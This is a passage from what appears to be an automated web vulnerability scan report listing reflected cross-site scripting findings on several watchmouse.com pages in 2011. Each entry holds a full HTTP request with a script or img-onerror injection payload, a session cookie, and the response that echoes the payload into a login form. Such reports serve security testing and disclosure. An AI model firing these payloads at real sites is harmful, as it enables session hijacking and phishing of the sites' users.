Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:44 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-18f4203549ae7c48556bd86419a8e8d3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en2ac78"><script>alert(1)</script>3ff20eb3e24/scripting.php" method="post">
...[SNIP]...

1.213. http://www.watchmouse.com/en/scripting.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/scripting.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e87"><script>alert(1)</script>8d7fc937638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/scripting.php98e87"><script>alert(1)</script>8d7fc937638 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-3829c41741ac708da38c54b0c848b67d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/scripting.php98e87"><script>alert(1)</script>8d7fc937638" method="post">
...[SNIP]...

1.214. http://www.watchmouse.com/en/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27836"><script>alert(1)</script>34e8fed9bf5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en27836"><script>alert(1)</script>34e8fed9bf5/search.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2812479f71f572e6cdabf24414e9dca6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en27836"><script>alert(1)</script>34e8fed9bf5/search.php" method="post">
...[SNIP]...

1.215. http://www.watchmouse.com/en/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb535"><script>alert(1)</script>49625e88926 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search.phpeb535"><script>alert(1)</script>49625e88926 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a695f46fd82f50bdb719de920ebf6e4c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/search.phpeb535"><script>alert(1)</script>49625e88926" method="post">
...[SNIP]...

1.216. http://www.watchmouse.com/en/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2be"><script>alert(1)</script>ae18970339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search.php?af2be"><script>alert(1)</script>ae18970339=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1bdd18da47a2f93e425b7676cf43c04a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/search.php?af2be"><script>alert(1)</script>ae18970339=1" method="post">
...[SNIP]...

1.217. http://www.watchmouse.com/en/security_news.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/security_news.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3c6"><script>alert(1)</script>b95973a59c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /encd3c6"><script>alert(1)</script>b95973a59c4/security_news.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-af0b6712281a3362165376aa808f6657"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/encd3c6"><script>alert(1)</script>b95973a59c4/security_news.php" method="post">
...[SNIP]...

1.218. http://www.watchmouse.com/en/security_news.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/security_news.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14254"><script>alert(1)</script>058baf01b6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/security_news.php14254"><script>alert(1)</script>058baf01b6a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-96f0b9024471f1139fefde4d96d5fbb7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/security_news.php14254"><script>alert(1)</script>058baf01b6a" method="post">
...[SNIP]...

1.219. http://www.watchmouse.com/en/security_news.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/security_news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede88"><script>alert(1)</script>597f9dc12c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/security_news.php?ede88"><script>alert(1)</script>597f9dc12c1=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-26ff80edebaa3ad290ea0e9e118742de"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/security_news.php?ede88"><script>alert(1)</script>597f9dc12c1=1" method="post">
...[SNIP]...

1.220. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/sitemap.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40133"><script>alert(1)</script>1f3586f5628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en40133"><script>alert(1)</script>1f3586f5628/sitemap.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-076e24d690c5f2145109e1a8f3439e18"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en40133"><script>alert(1)</script>1f3586f5628/sitemap.php" method="post">
...[SNIP]...

1.221. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/sitemap.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 767da"><script>alert(1)</script>6fdc1c8f29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/sitemap.php767da"><script>alert(1)</script>6fdc1c8f29 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-45cecd5cb505dd6d03fc09e0e93a9d82"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/sitemap.php767da"><script>alert(1)</script>6fdc1c8f29" method="post">
...[SNIP]...

1.222. http://www.watchmouse.com/en/sitemap.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b2ea"><script>alert(1)</script>5ed9b16a840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/sitemap.php?6b2ea"><script>alert(1)</script>5ed9b16a840=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3fbd600192de025246a15bd7e3885f3d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/sitemap.php?6b2ea"><script>alert(1)</script>5ed9b16a840=1" method="post">
...[SNIP]...

1.223. http://www.watchmouse.com/en/terms.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/terms.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b45"><script>alert(1)</script>2ad67787581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en72b45"><script>alert(1)</script>2ad67787581/terms.php?mlang=en HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c7a7046a7f9d2381951d38c593b3741e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en72b45"><script>alert(1)</script>2ad67787581/terms.php?mlang=en" method="post">
...[SNIP]...

1.224. http://www.watchmouse.com/en/terms.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/terms.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9ff"><script>alert(1)</script>f72b5c6d527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/terms.php5b9ff"><script>alert(1)</script>f72b5c6d527?mlang=en HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0595a5f742f28768002dceef459ba5c4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/terms.php5b9ff"><script>alert(1)</script>f72b5c6d527?mlang=en" method="post">
...[SNIP]...

1.225. http://www.watchmouse.com/en/terms.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/terms.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91bd0"><img%20src%3da%20onerror%3dalert(1)>8cd577ee570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91bd0"><img src=a onerror=alert(1)>8cd577ee570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/terms.php/91bd0"><img%20src%3da%20onerror%3dalert(1)>8cd577ee570 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e95e8b5d9d62bac0bdc7c9a5fdda28ad"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>WatchMouse website monitoring service - Terms and Conditio
...[SNIP]...
<form method="post" name="91bd0"><img src=a onerror=alert(1)>8cd577ee570" action="91bd0">
...[SNIP]...

1.226. http://www.watchmouse.com/en/tos.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/tos.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d077"><script>alert(1)</script>63f0196ca1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en3d077"><script>alert(1)</script>63f0196ca1/tos.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
